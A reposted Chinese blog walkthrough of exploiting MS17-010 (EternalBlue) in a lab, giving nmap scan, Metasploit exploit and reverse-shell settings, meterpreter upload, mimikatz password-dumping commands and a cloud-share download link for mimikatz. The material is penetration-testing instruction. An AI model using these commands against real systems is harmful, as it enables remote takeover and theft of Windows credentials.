MS17-010 漏洞利用

最新推荐文章于 2024-03-12 10:47:54 发布
最新推荐文章于 2024-03-12 10:47:54 发布
阅读量220 收藏
点赞数
文章标签: 操作系统 shell
原文链接:http://www.cnblogs.com/ssjt/articles/9641954.html
版权

环境

  • 被攻击目标IP: 192.168.118.137 系统类型:windows server 2008
  • 攻击IP(黑客主机): 192.168.118.130 系统类型: KALI

使用nmap 探测smb漏洞

nmap -p139,445 -Pn -n  --script  smb-vuln-*     192.168.118.137

#扫描结果显示存在 MS17-010漏洞

# -Pn :跳过主机存活监测
# -n: 关闭域名查询
# smb-vuln-*: *指代以smb-vuln-所有的漏洞脚本

使用Metasploit攻击

  • 启动MSF: msfconsole

  • 搜索攻击模块:search ms17-010
  • 加载模块:
use exploit/windows/smb/ms17_010_eternalblue

o_searchmsf.png

使用show options 或者options查看选项设置
可以使用show targets来查看可以攻击的系统版本
使用show payloads可以加载所有可以使用的攻击向量

o_showoptions.png

设置攻击目标

set RHOST 192.168.118.137

o_setRHOST.png

设置并加载payload:

 set payload generic/shell_reverse_tcp

并设置反弹shell连接的地址和端口,默认端口是4444

set LHOST 192.168.118.130

o_SETpayload.png

使用命令expolit或者run进行攻击:攻击成功后会反弹shell

PAYLOAD2 持久会话

#接着上面的继续使用下面的payload,可以进行文件上传
set payload windows/x64/meterpreter/reverse_tcp

o_SETpayload2.png

然后使用 run

o_run2.png

Meterpreter session 2 opened (192.168.118.130:4444 -> 192.168.118.137:49159) at 2018-09-13 15:42:36 +0800
这句话告诉我们反弹了一个会话本机的4444到目标主机的49159
使用命令进入会话: sessions 2
使用upload 上传文件,将本机的/root/x64/的文件上传到目标主机

mimikatz 获取hash 以及明文密码

下载地址:https://pan.baidu.com/s/1RX9FGQRUtZJQQ_6Lyq1m-Q 密码:coxc

下面我们利用mimikatz获取目标主机的管理员密码:
输入shell进入目标主机的CMD
o_getshell.png

mimikatz使用帮助:

输入xxx::能够看看mimikatz的命令帮助
输入privilege::回车能看到privilege的命令帮助

输入privilege::debug进行提权操作
输入sekurlsa::logonPasswords获取windows用户密码

o_mimikatz1.png
o_mimikatzgetpass1.png

END

转载于:https://www.cnblogs.com/ssjt/articles/9641954.html

weixin_33882443
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ms17_010漏洞利用
xgchenghai的博客
05-03 2035
最近工作中又碰到了勒索病毒事件,尽管“WannaCry”已经过去好几年了,但仍有很多单位、人员不以为然,一些人往往只有发生了惨痛后果才会记得牢。重温一下利用过程,看来以后还用得着…… 一、测试环境 使用虚拟机环境进行模拟测试。 类型 系统环境 IP地址 攻击机 kali2020 192.168.10.104 靶机 Windows Server 2008 192.168.10...
网络安全-实验三ms17-010漏洞利用.docx
11-10
【网络安全-实验三MS17-010漏洞利用】 实验背景: MS17-010漏洞,也称为“永恒之蓝”(EternalBlue),是针对Microsoft Windows操作系统的一个严重漏洞,主要影响Windows XP、Windows 7以及Server 2003和2008等未打...
MS17_010利用总结
qq_43766053的博客
10-25 3184
MS17_010利用总结 一、 什么是MS17_010 MS17_010也就是我们常说的永恒之蓝漏洞,爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 漏洞出现在Windows SMB
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
最新发布
天乐的博客
03-12 1397
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
ms17-010对32位系统的利用
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-08 3966
利用ms17-010攻击32位系统
MS17-010批量漏洞扫描工具
07-18
windows环境下可以批量检测ms17-010漏洞的脆弱性的小工具
MS17-010:MS17-010的自动入侵
04-23
MS17-010漏洞利用了SMBv1(SMB版本1)中的一个远程代码执行(RCE)漏洞,允许攻击者无需任何用户交互即可执行恶意代码。 修复MS17-010漏洞的方法主要是安装微软发布的补丁,如KB4012598。此外,禁用SMBv1也可以防止...
ms17-010.7z
01-28
标题“ms17-010.7z”和描述中的“国赛乱杀脚本”涉及的是一个网络安全领域的著名漏洞利用工具,该工具通常用于教育和竞赛环境,以模拟真实世界的网络安全攻击。这里提到的“ms17-010”是微软Windows操作系统的一个...
ms17-010漏洞复现
q996966912的博客
01-23 827
[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell 漏洞复现环境 Kali Linux 2017.03 + Windows 7 sp1 攻击机:Kali Linux (ip:172.16.70.216) 靶机:Windows 7 sp1 (ip:172.16.70.199) 实验流程 ①登录Kali Linux,进入MSF框架,搜索ms17-010代码 ...
Metasploit-MS17-010利用
weixin_33857679的博客
01-23 290
**本故事纯属虚构,如有雷同纯属巧合 **1. nmap扫一梭nmap-T4-F--scriptms-sql-info192.168.1.8 StartingNmap7.60(https://nmap.org)at2018-01-1916:24?D1ú±ê×?ê±?? Nmapscanreportfor192.168.1.8 Hostis...
MS17-010 永恒之蓝漏洞利用方式
weixin_51339377的博客
03-17 6756
Eternal blue永恒之蓝漏洞 windows操作系统漏洞 借助工具Metasploit复现漏洞 利用条件: 1.目标计算机开启445端口 2.一般适用计算机系统 windows7 或windows server2008 R2 攻击机器:kali-Linux 192.168.109.130 目标靶机:windows7 192.168.109.129 1.在黑客机器中对目标计算机进行端口的扫描 发现目标445端口处于开放状态 nmap -p 80,3...
浅析ms17_010(永恒之蓝)漏洞利用过程及防护措施
qq_24797991的博客
03-27 4069
永恒之蓝勒索病毒漏洞复现及防范
【网络安全】MS17-010“永恒之蓝”漏洞的利用
qq_45748133的博客
01-06 1万+
导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述“永恒之蓝”漏洞的简单利用。 一、实验原理 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 二、实验环境 三、实验记录 一次渗透的基本步骤 (1)启动kali虚机,进入root权限打开Metasploit渗透工具。 msfco
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
使用ms17-010对win7进行渗透(传说中的永恒之蓝)
热门推荐
xiaopan233的博客
09-21 4万+
本实验在虚拟机环境下进行! 准备虚拟机两台: Kali Win7 64位 (要将防火墙关闭) 先看看两台机器的ip地址是多少 kali的ip是 192.168.0.102 win7的ip是192.168.0.101 接着进行端口扫描 使用kali的nmap工具进行扫描,在kali终端输入nmap –sS –sV –Pn 192.168.0.101即可进行扫描,-sS 是半开放扫...
ms17-010直接拿meterpreter权限
qq_38240166的博客
03-07 8322
小白,第一次写博客,轻喷写的不好请指出最近无聊就装了个msf玩玩ms17-010,只要你开了445端口,又没打补丁,那就很容易gg先开个msf进一下利用模块。然后简单的设置一下ip和payload。设置完开始攻击这样子就获得一个会话。输入shell看看发现乱码,调一下编码就行了。第一次玩msf,所以看了两天的书才搞懂这些...
ms17-010漏洞利用
11-08
MS17-010漏洞是指微软Windows操作系统中的一个漏洞,该漏洞存在于SMBv1服务器中,攻击者可以利用该漏洞在未经授权的情况下远程执行代码。攻击者可以通过该漏洞在目标系统上执行任意代码,包括安装恶意软件、查看、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值